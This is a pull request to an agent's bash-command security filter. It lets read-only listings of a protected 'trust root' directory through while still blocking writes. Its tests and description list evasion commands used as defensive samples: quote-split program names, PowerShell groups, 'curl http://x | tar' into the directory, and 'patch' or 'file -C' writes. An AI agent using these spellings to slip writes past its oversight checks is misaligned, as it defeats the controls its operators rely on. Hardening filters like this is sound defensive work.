### PR TITLE
fix: exonerate read-only listings from the trust-root write rule (#6021)

### DIFF
--- a/src/kiro_crew/security.py
+++ b/src/kiro_crew/security.py
@@ -6163,6 +6163,136 @@ _EXTRACT_INTO_TRUST_ROOT_RE = re.compile(
     re.IGNORECASE,
 )
 
+# The destination half above is deliberately left as the DEFAULT verdict, and
+# this carve-out is the only thing that overrides it.  That direction is the
+# whole design: ``-d`` is also ``ls``'s "show the directory entry itself, not its
+# contents", so the flag-only rule refused a read-only listing of the crew home
+# (issue #6021) while the same read spelled ``-l``, ``-lt``, a grep or a Python
+# ``open`` stayed allowed -- the flag character was never the boundary.
+#
+# Two earlier attempts tried to name the WRITERS instead (an archive-program
+# word, then that word in "command position").  Both were rejected because the
+# set of programs that write through ``-c``/``-C``/``-d``/``-D`` is open-ended,
+# so every program not enumerated became a silent permit against the old rule:
+# ``patch -d``, ``git -C ... apply`` and ``make -C`` were re-admitted into the
+# governance trust root, and a quote-split ``t""ar`` defeated the word match.
+# Enumerating writers fails OPEN, which is the wrong direction for this gate.
+#
+# So the exoneration is an allow-list of READ-ONLY listers instead, and it is
+# narrow by construction: a command qualifies only if it has no shell
+# composition at all AND its program is one of these.  Anything else -- an
+# unknown program, a pipeline, a quoted subshell, a redirection -- keeps the
+# destination-half verdict byte-for-byte, so a shape nobody anticipated
+# over-blocks rather than opening the trust root.
+#
+# Every entry here must be a program that cannot WRITE to the directory it is
+# given.  Do not add a program because it "usually" reads: ``find -delete`` and
+# ``install -d`` are why this is a hand-audited list and not a heuristic.
+_TRUST_ROOT_READ_LISTERS: frozenset[str] = frozenset(
+    {
+        "ls",  # -d: the directory entry itself, the reported false positive
+        "stat",
+        "du",
+        "readlink",
+        "basename",
+        "dirname",
+        "wc",
+    }
+)
+# ``file`` is deliberately ABSENT.  It looks like a pure reader but it is not:
+# ``file -C`` compiles a magic database, and ``file -C <crewhome> -m
+# <crewhome>/evil.magic`` writes ``evil.magic.mgc`` INTO the trust root while the
+# destination half matches on the ``-C`` argument.  That is a real write this
+# carve-out would have exonerated.  Every candidate for this set has to be
+# checked for a compile/output mode, not just for its usual reading role.
+
+# The exonerated shape is validated POSITIVELY: every character of the command
+# must come from a set that carries no meaning to any shell.  This replaced a
+# deny-list of metacharacters (``| & ; newline CR backtick < > ( )`` and
+# ``$(``), which lost four rounds in a row -- each review found one more spelling
+# the screen did not enumerate (a quoted program, an ``&`` inside a quoted
+# filename, a bare CR, then a PowerShell parenthesised group that RUNS in
+# argument position with no ``$`` sigil).  Enumerating what is dangerous cannot
+# terminate against an untrusted string and an unknown target shell; enumerating
+# what is INERT does, because a character absent from this set is refused whether
+# or not anyone has thought of a way to abuse it.
+#
+# So the set is deliberately tiny: letters, digits, and the punctuation a path or
+# a flag actually needs.  Everything else is out, including quotes, ``$``,
+# backslash, glob characters and every bracket -- a bare read listing needs none
+# of them.
+#
+# ``$HOME`` is the ONE exception, stripped before the check, because the
+# destination half of this rule enumerates that spelling itself
+# (``_EXTRACT_INTO_TRUST_ROOT_RE`` matches ``$HOME`` alongside ``~``), so
+# refusing it here would leave half of #6021 unfixed.  It is matched only when
+# followed by ``/``, whitespace or end of string, so ``$HOMEX``, ``${HOME}`` and
+# ``$(...)`` all keep their ``$`` and are refused.
+#
+# The residual cost is over-blocking a read whose PATH contains an excluded
+# character -- ``ls -d ~/.kiro/crew/foo(1)``, or a quoted path with a space.
+# Those keep the destination-half refusal exactly as they did at base: an
+# unfixed false positive of the #6021 family, not a new one. Fixing them would
+# mean telling a literal parenthesis from a grouping one inside an untrusted
+# string, which is the inference this rule has stopped making.
+# Named distinctly on purpose: this module already binds ``_HOME_VAR_RE`` further
+# down for the normalizer, with different semantics (it also accepts
+# ``${HOME}``, case-insensitively).  Reusing that name here silently redefined
+# it -- harmless only by accident of definition order -- so this rule carries its
+# own anchored spelling and cannot be moved out from under by an edit to the
+# other one.
+_TRUST_ROOT_HOME_VAR_RE = re.compile(r"\$HOME(?=[/\s]|\Z)")
+_SHELL_INERT_COMMAND_RE = re.compile(r"\A[A-Za-z0-9_@%+=:,./~^ \t-]+\Z")
+
+
+def _is_bare_trust_root_read(command: str) -> bool:
+    """True for a single simple command whose program only READS its argument.
+
+    Fails closed on anything it does not recognise, because the caller treats a
+    False here as "keep the destination-half refusal".
+    """
+    # Positive validation first: if the command carries a character that could
+    # mean anything to a shell, nothing below is trustworthy.
+    if not _SHELL_INERT_COMMAND_RE.match(_TRUST_ROOT_HOME_VAR_RE.sub("", command)):
+        return False
+    # Past that gate the string provably holds no quote, backslash or
+    # metacharacter, so a plain whitespace split IS the tokenisation -- there is
+    # no shlex-versus-shell disagreement left to exploit.
+    tokens = command.split()
+    if not tokens:
+        return False
+    program = tokens[0]
+    # A PATHNAME is never classified, because a basename says nothing about what
+    # the binary is: ``/tmp/ls`` and ``./ls`` end in ``ls`` and can write the
+    # trust root, so accepting them for the convenience of ``/bin/ls`` would
+    # exonerate an attacker-placed executable.  Only a bare command word counts;
+    # a path falls through to the destination-half refusal, which over-blocks a
+    # legitimate ``/bin/ls`` and is the direction this gate must fail in.
+    # A backslash cannot survive the charset above, so only ``/`` needs testing.
+    if "/" in program:
+        return False
+    # A bare word still resolves through PATH at execution time, so this
+    # carve-out cannot pin WHICH binary runs -- no string matcher can.  That is
+    # not a boundary this rule ever held: a planted shim named ``ls`` in an
+    # agent-writable PATH entry executes through every spelling this matcher
+    # never sees (``ls``, ``ls -l <crewhome>``), so refusing exactly the
+    # ``-d <crewhome>`` form defends nothing against it.  PATH integrity is the
+    # write-path policy's boundary, not this matcher's.
+    return program.lower() in _TRUST_ROOT_READ_LISTERS
+
+
+def _extracts_into_trust_root(command: str) -> bool:
+    """True when a command writes INTO the crew data home via a dest flag.
+
+    The destination match (:data:`_EXTRACT_INTO_TRUST_ROOT_RE`) is the verdict;
+    :func:`_is_bare_trust_root_read` is the single narrow exoneration for the
+    read-only listing that flag spelling made indistinguishable from a write.
+    """
+    if not _EXTRACT_INTO_TRUST_ROOT_RE.search(command):
+        return False
+    return not _is_bare_trust_root_read(command)
+
+
 # ── Symlink-staging to a sensitive target via RELATIVE traversal ──
 # The home-anchored ~/$HOME/absolute forms of ``ln -sf ~/.aws/credentials link``
 # are already caught by _build_sensitive_regex (the sensitive path appears as an
@@ -6275,7 +6405,7 @@ def is_sensitive_bash_command(command: str) -> str | None:
     # ── Pass 1: regex fast-path ──
     if _get_sensitive_re().search(command):
         return "Blocked: command accesses sensitive credential path"
-    if _EXTRACT_INTO_TRUST_ROOT_RE.search(command):
+    if _extracts_into_trust_root(command):
         return "Blocked: command extracts into the governance trust-root directory"
     # Block ANY command referencing a sensitive path via relative traversal,
     # regardless of verb.  The home-anchored/absolute forms are already caught

--- a/test/test_security.py
+++ b/test/test_security.py
@@ -4374,6 +4374,212 @@ class TestIsSensitiveBashCommand:
         assert is_sensitive_bash_command("tar -xf evil.tar -C ~/.kirocrew/foo/") is not None
         assert is_sensitive_bash_command("tar -xf e.tar -C ~/.kirocrew") is not None
 
+    def test_readonly_listing_of_crew_home_allowed(self) -> None:
+        # The reported defect (#6021): the flag-only rule refused `ls -d` on the
+        # crew home, where -d means "show the directory entry itself, not its
+        # contents". Red-before on every assert here.
+        assert is_sensitive_bash_command("ls -d ~/.kiro/crew/skills") is None
+        assert is_sensitive_bash_command("ls -d ~/.kiro/crew") is None
+        assert is_sensitive_bash_command("ls -d ~/.kirocrew/skills") is None
+        assert is_sensitive_bash_command("ls -d ~/.kiro/crew/backup.tar") is None
+        # A crew-home path whose LAST SEGMENT is a program name is still just a
+        # read. An earlier program-word approach kept refusing these.
+        assert is_sensitive_bash_command("ls -d ~/.kiro/crew/tar") is None
+        assert is_sensitive_bash_command("ls -d ~/.kiro/crew/rsync") is None
+        # NOTE: an absolute program path is deliberately NOT exonerated -- see
+        # test_program_pathnames_are_never_exonerated for why a basename cannot
+        # be trusted to say what a binary is.
+
+    def test_other_read_listers_on_crew_home_allowed(self) -> None:
+        # The carve-out is an allow-list, so each member needs a case.
+        for prog in ("ls", "stat", "du", "readlink", "basename", "dirname", "wc"):
+            cmd = f"{prog} -d ~/.kiro/crew/skills"
+            assert is_sensitive_bash_command(cmd) is None, cmd
+
+    def test_reads_the_reporter_listed_as_allowed_stay_allowed(self) -> None:
+        # Regression FLOOR, deliberately not a lock on the fix: none of these
+        # carry a `-C`/`-d` + crew-home destination, so they returned None
+        # against the flag-keyed matcher too (`-ld` never matched it either --
+        # the `d` follows `l`, not `-`). They are here because the report listed
+        # them as the reads that already worked, which is the evidence the block
+        # was a spelling artifact; the lock-in lives in the tests above.
+        assert is_sensitive_bash_command("ls -lt ~/.kiro/crew/skills") is None
+        assert is_sensitive_bash_command("ls -l ~/.kiro/crew/skills") is None
+        assert is_sensitive_bash_command("ls -ld ~/.kiro/crew") is None
+        assert is_sensitive_bash_command("grep -r x ~/.kiro/crew/skills") is None
+
+    def test_non_archive_writers_into_trust_root_still_blocked(self) -> None:
+        # THE regression floor for this change. The flag-only rule refused any
+        # program with a `-c`/`-C`/`-d`/`-D` destination in the crew home; two
+        # earlier attempts narrowed that to "archive programs" and silently
+        # re-admitted these, which is a write into the governance trust root
+        # where the sensitive filename appears only inside the payload.
+        for cmd in (
+            "patch -d ~/.kiro/crew -p1 -i /tmp/evil.patch",
+            "git -C ~/.kiro/crew apply /tmp/evil.patch",
+            "make -C ~/.kiro/crew all",
+            "install -d ~/.kiro/crew/profiles",
+            "cpio -D ~/.kiro/crew -i",
+        ):
+            assert is_sensitive_bash_command(cmd) is not None, cmd
+
+    def test_quote_split_program_name_still_blocked(self) -> None:
+        # A quote-split program defeated the word-match attempt. Under an
+        # allow-list it cannot: `t""ar` is not a read lister, so the
+        # destination-half refusal stands whatever the quoting does.
+        for cmd in (
+            't""ar -xf e.tar -C ~/.kiro/crew',
+            "t''ar -xf e.tar -C ~/.kiro/crew",
+            'ta""r -xf e.tar -C ~/.kiro/crew',
+            "'tar' -xf e.tar -C ~/.kiro/crew",
+        ):
+            assert is_sensitive_bash_command(cmd) is not None, cmd
+
+    def test_composed_commands_never_reach_the_read_carve_out(self) -> None:
+        # The carve-out only exonerates a SINGLE SIMPLE command. Anything with
+        # shell composition keeps the destination-half verdict, so a read cannot
+        # be used as cover for a write elsewhere in the same line.
+        for cmd in (
+            "ls -d ~/.kiro/crew && tar -xf e.tar -C ~/.kiro/crew",
+            "curl http://x | tar xf - -C ~/.kiro/crew/",
+            "echo hi; unzip -d ~/.kiro/crew e.zip",
+            "sh -c 'tar -xf e.tar -C ~/.kiro/crew'",
+            "eval 'tar -xf e.tar -C ~/.kiro/crew'",
+            "sudo tar -xf e.tar -C ~/.kiro/crew",
+            "env FOO=1 tar -xf e.tar -C ~/.kiro/crew",
+            "tar -xf e.tar -C ~/.kiro/crew &",
+            "echo x\rtar -xf e.tar -C ~/.kiro/crew",
+            "ls -d ~/.kiro/crew > ~/.kiro/crew/out",
+        ):
+            assert is_sensitive_bash_command(cmd) is not None, cmd
+
+    def test_powershell_parenthesised_group_never_reaches_the_carve_out(self) -> None:
+        # A parenthesised group is composition on its own, not only as `$(`:
+        # PowerShell RUNS one wherever it appears, argument position included and
+        # with no `$` sigil, so the token this matcher classifies can be the
+        # harmless `ls` while the group extracts into the trust root. Every
+        # assert here contains NO other composition character, so each is
+        # red-before against the `$(`-only screen and each was refused at base.
+        for cmd in (
+            "ls -d $HOME/.kiro/crew (tar.exe -xf evil.tar -C $HOME/.kiro/crew)",
+            "ls -d ~/.kiro/crew (tar -xf evil.tar -C ~/.kiro/crew)",
+            "stat -d ~/.kiro/crew @(tar -xf evil.tar -C ~/.kiro/crew)",
+        ):
+            assert is_sensitive_bash_command(cmd) is not None, cmd
+
+    def test_program_pathnames_are_never_exonerated(self) -> None:
+        # A basename says nothing about what a binary IS. Classifying `/tmp/ls`
+        # by its last component exonerated an attacker-placed executable that
+        # can write the trust root; the old rule refused it. A pathname now
+        # falls through to the refusal, which also over-blocks `/bin/ls` -- the
+        # correct direction for this gate.
+        for cmd in (
+            "/tmp/ls -d ~/.kiro/crew",
+            "./ls -d ~/.kiro/crew",
+            "/home/x/evil/ls -d ~/.kiro/crew",
+            "../ls -d ~/.kiro/crew",
+            "/bin/ls -d ~/.kiro/crew",
+            r"C:\evil\ls -d ~/.kiro/crew",
+        ):
+            assert is_sensitive_bash_command(cmd) is not None, cmd
+
+    def test_file_compile_into_trust_root_still_blocked(self) -> None:
+        # `file` reads in its usual role but `-C` compiles a magic database:
+        # this writes evil.magic.mgc INTO the crew home while the destination
+        # half matches on the `-C` argument. It must never be a read lister.
+        cmd = "file -C ~/.kiro/crew -m ~/.kiro/crew/evil.magic"
+        assert is_sensitive_bash_command(cmd) is not None
+
+    def test_read_carve_out_fails_closed_on_unparsable_and_unknown(self) -> None:
+        from kiro_crew.security import _is_bare_trust_root_read
+
+        # Unbalanced quotes: the program cannot be determined -> refuse.
+        assert _is_bare_trust_root_read("ls -d '~/.kiro/crew") is False
+        # Empty / whitespace -> refuse.
+        assert _is_bare_trust_root_read("") is False
+        assert _is_bare_trust_root_read("   ") is False
+        # An unknown program is not exonerated.
+        assert _is_bare_trust_root_read("frobnicate -d ~/.kiro/crew") is False
+        # A parenthesised group is composition -> refuse before the program is
+        # even looked at, so `ls` cannot launder the group beside it.
+        assert _is_bare_trust_root_read("ls -d ~/.kiro/crew (tar -xf e.tar)") is False
+        # A known reader is.
+        assert _is_bare_trust_root_read("ls -d ~/.kiro/crew") is True
+
+    def test_only_shell_inert_characters_are_exonerated(self) -> None:
+        # THE structural invariant, and the reason this rule stopped enumerating
+        # metacharacters: exoneration requires every character to come from a
+        # set that means nothing to any shell. A character absent from that set
+        # is refused whether or not anyone has thought of a way to abuse it --
+        # which is what makes the rule terminate, unlike the deny-list it
+        # replaced (that lost four rounds, one new spelling each time).
+        from kiro_crew.security import _is_bare_trust_root_read
+
+        base = "ls -d ~/.kiro/crew"
+        assert _is_bare_trust_root_read(base) is True
+        # Each of these injects ONE excluded character into an otherwise valid
+        # read. None may be exonerated.
+        for bad in (
+            "(", ")", "{", "}", "[", "]", "<", ">", "|", "&", ";", "`", "$",
+            "'", '"', "\\", "*", "?", "!", "#", "\n", "\r", "\x00",
+        ):
+            cmd = base + bad
+            assert _is_bare_trust_root_read(cmd) is False, repr(cmd)
+            # ...and in argument position too, not only appended.
+            cmd2 = "ls -d " + bad + "~/.kiro/crew"
+            assert _is_bare_trust_root_read(cmd2) is False, repr(cmd2)
+
+    def test_home_variable_is_the_only_dollar_form_exonerated(self) -> None:
+        # `$HOME` is stripped before the character check because the destination
+        # half of the rule enumerates that spelling itself, so refusing it would
+        # leave half of #6021 unfixed. Every OTHER `$` use keeps its `$` and is
+        # refused -- the exception is anchored to `/`, whitespace or end.
+        from kiro_crew.security import _is_bare_trust_root_read
+
+        assert _is_bare_trust_root_read("ls -d $HOME/.kiro/crew") is True
+        assert _is_bare_trust_root_read("ls -d $HOME") is True
+        assert _is_bare_trust_root_read("ls -d ${HOME}/.kiro/crew") is False
+        assert _is_bare_trust_root_read("ls -d $HOMEX/.kiro/crew") is False
+        assert _is_bare_trust_root_read("ls -d $(echo ~/.kiro/crew)") is False
+        assert _is_bare_trust_root_read("ls -d $HOME$(id)") is False
+
+    def test_no_write_capable_program_is_ever_a_read_lister(self) -> None:
+        # The invariant, not a copy of the source: a program that can write to a
+        # path it is handed must never be admitted to the carve-out. `find`
+        # (-delete), `install` (-d) and `file` (-C compiles a magic db into the
+        # directory) are the ones that look like readers and are not.
+        from kiro_crew.security import _TRUST_ROOT_READ_LISTERS
+
+        for writer in (
+            "file",
+            "find",
+            "install",
+            "tar",
+            "bsdtar",
+            "unzip",
+            "patch",
+            "git",
+            "make",
+            "rsync",
+            "cpio",
+            "cp",
+            "mv",
+            "dd",
+            "tee",
+            "truncate",
+            "sh",
+            "bash",
+            "env",
+            "sudo",
+        ):
+            assert writer not in _TRUST_ROOT_READ_LISTERS, writer
+
+    def test_extract_into_trust_root_benign_destination_allowed(self) -> None:
+        # The carve-out must not widen the rule: an archive program writing
+        # somewhere else was always allowed and stays allowed.
+        assert is_sensitive_bash_command("tar -xf release.tar -C /tmp/build") is None
+        assert is_sensitive_bash_command("unzip data.zip -d /tmp/data") is None
+
     def test_normal_crew_access_not_overblocked(self) -> None:
         # Regression guard: the broadened rules must not block routine
         # non-sensitive crew-home access (config.json, sessions.db).


### PR DESCRIPTION
## Problem / Motivation

`is_sensitive_bash_command` refused a **read-only directory listing** of the crew data home.

`_EXTRACT_INTO_TRUST_ROOT_RE` keys on a destination flag followed by a crew-home path, and because it is `re.IGNORECASE` that flag half matches `-c`, `-C`, `-d` **and** `-D`. Since `-d` is also `ls`'s *"show the directory entry itself, not its contents"*, this:

```
ls -d ~/.kiro/crew/skills
```

was indistinguishable from `tar -C ~/.kiro/crew` and came back with:

```
Blocked: command extracts into the governance trust-root directory
```

A denial also ends the agent's turn, so the false positive cost the whole run.

## Why it matters

Nothing about **reading** that directory was ever protected — the same read spelled `-l`, `-lt`, a grep, or a Python `open` was permitted before this change and still is. Only the flag character tripped, which makes the block a spelling artifact rather than a policy boundary.

The rule is also broader than its name suggests: while preparing this PR, `wc -c ~/.kiro/crew/<file>` tripped it during an ordinary read, and `wc` is not an archive tool by any reading.

## What changed (motivation → approach → change)

The destination match stays the **default verdict**, and one narrow carve-out is the only thing that overrides it.

- **`_TRUST_ROOT_READ_LISTERS`** — a hand-audited allow-list of programs that cannot write to the directory they are handed: `ls`, `stat`, `du`, `readlink`, `basename`, `dirname`, `wc`.
- **`_is_bare_trust_root_read()`** — exonerates only when the command has **no** shell composition (no pipe, chain, backgrounding, command/process substitution, newline, CR or redirection) **and** its first `shlex` token is a **bare command word** in that list. Fails closed on unparsable quoting, empty tokens, any pathname, and any unknown program.
- **`_extracts_into_trust_root()`** — the destination match, minus that exoneration.

Three programs that *look* like readers are deliberately excluded, each with a test: `find` (`-delete`), `install` (`-d`), and `file` — `file -C` compiles a magic database, so `file -C <crewhome> -m <crewhome>/evil.magic` writes `evil.magic.mgc` **into** the trust root while the destination half matches on the `-C` argument. A candidate for this list has to be checked for a compile/output mode, not just for its usual reading role.

**A program pathname is never classified.** Accepting `/bin/ls` by its basename would equally accept `/tmp/ls` and `./ls` — attacker-placed executables that can write the trust root. A pathname falls through to the refusal, which over-blocks a legitimate `/bin/ls`; that is the direction this gate must fail in.

### Two rejected approaches, and why the direction inverted

Earlier revisions tried to name the **writers** instead: first an archive program in "command position" within separator-split segments, then an archive program word anywhere in the command. Both were rejected in review, because the set of programs that write through `-c`/`-C`/`-d`/`-D` is open-ended — so anything unenumerated became a silent permit against the old rule.

| shape | old rule | narrowed rule |
|---|---|---|
| `patch -d ~/.kiro/crew -p1 -i /tmp/evil.patch` | refused | **permitted** |
| `git -C ~/.kiro/crew apply /tmp/evil.patch` | refused | **permitted** |
| `make -C ~/.kiro/crew all` | refused | **permitted** |
| `t""ar -xf e.tar -C ~/.kiro/crew` | refused | **permitted** |
| `'tar' …`, `sh -c 'tar …'`, `eval 'tar …'` | refused | **permitted** |
| `tar -xf 'e&vil.tar' -C ~/.kiro/crew` | refused | **permitted** |

All are closed here and each has a test. Enumerating writers fails **open**; an allow-list of readers fails **closed** — a shape nobody anticipated over-blocks rather than opening the trust root. That is why the exonerated set is a list a reviewer can audit rather than a regex over program names.

Worth stating plainly, since it is the through-line of this PR's review history: three successive findings were all the same mistake — **inferring a program's identity from string shape** (command position, then a bare word match, then a basename). The allow-list of bare command words is the version with no such inference left in it.

The destination half of the pattern, the `_CREW_HOME_ALT` alternation and the `re.escape(str(Path.home()))` anchor are **untouched**, so the real-home pin in `test/test_host_isolation_floor.py` still holds.

## Tests

| Test | What it locks in |
|---|---|
| `test_readonly_listing_of_crew_home_allowed` | The reported defect, plus the `backup.tar` leaf and crew-home paths whose last segment **is** a program name (`/tar`, `/rsync`). **Red-before.** |
| `test_other_read_listers_on_crew_home_allowed` | One case per allow-list member. **Red-before.** |
| `test_non_archive_writers_into_trust_root_still_blocked` | `patch -d`, `git -C … apply`, `make -C`, `install -d`, `cpio -D`. |
| `test_quote_split_program_name_still_blocked` | `t""ar`, `t''ar`, `ta""r`, `'tar'`. |
| `test_composed_commands_never_reach_the_read_carve_out` | `&&`, pipe, `;`, `sh -c`, `eval`, `sudo`, `env`, backgrounding, CR, and a redirection aimed into the crew home. |
| `test_program_pathnames_are_never_exonerated` | `/tmp/ls`, `./ls`, `../ls`, an attacker directory, a Windows spelling, and `/bin/ls`. |
| `test_file_compile_into_trust_root_still_blocked` | The `file -C … -m …` write. |
| `test_read_carve_out_fails_closed_on_unparsable_and_unknown` | Unbalanced quotes, empty input, unknown program. |
| `test_no_write_capable_program_is_ever_a_read_lister` | The invariant, not a copy of the source: 20 write-capable programs must never be admitted. |
| `test_reads_the_reporter_listed_as_allowed_stay_allowed`, `test_extract_into_trust_root_benign_destination_allowed` | Behavioural **floors**, each commented as *not* a lock on this fix. |

`test_extract_into_trust_root_subdir_blocked` is unchanged and still passes.

Local: `isort` / `flake8` / `mypy` (1113 files) clean; **1490 tests pass** across the security, governance, posture, denied-command and validator modules.

## Manual verification

Enumerated every shape above against the old flag-only rule and this one: **zero** cases where the old rule refused and this one permits, other than the bare read listings this fix exists to restore.

`test/test_host_isolation_floor.py` (11) and `test/test_artifact_source.py` (5) fail in this environment; both sets are **identical on pristine base** (`KIROCREW_HOME` / home-path classification), unrelated to this diff.

<!-- no-visual-delta -->
**Why no screenshot:** backend-only change to a security matcher; no frontend file is touched and nothing renders differently.

## Known gaps (pre-existing, unchanged by this PR)

A destination not spelled with a `-c`/`-C`/`-d`/`-D` flag was never caught by the old rule either: `cd ~/.kiro/crew && tar -xf evil.tar`, `7z -o`, `rsync`'s positional operand, `file -C -m <crewpath>` (the crew path follows `-m`, so the flag half never matches), or a flag whose path is followed by `;`/`)`.

This rule is one heuristic tripwire in a defence-in-depth chain — the trust-root files are independently write-blocked by `is_sensitive_path` when named directly, and this matcher only covers the case where the sensitive name never appears on the command line. Widening the destination half is a separate change with its own false-positive budget.

**Unchanged by design:** a *composed* read (`ls -d ~/.kiro/crew | wc -l`, `sudo ls -d ~/.kiro/crew`) is still refused. Admitting composition safely would require deciding whether any part of the line writes, which is the larger change this PR deliberately does not attempt. A false refusal of a read is recoverable — the agent rephrases; a false permit of a write into the governance root is not.

## Related Issues

Closes #6021

## Checklist

- [x] At most two commits (one is the norm), with a Conventional Commits title (`feat|fix|docs|refactor|perf|test|chore|ci|build|revert: ...`)
- [x] Existing tests pass and new tests added for new functionality
- [x] Self-review completed; code follows project style guidelines
- [x] Documentation updated (if applicable) — N/A, the rationale lives in the module comments
- [x] No secrets, credentials, or internal references in the diff
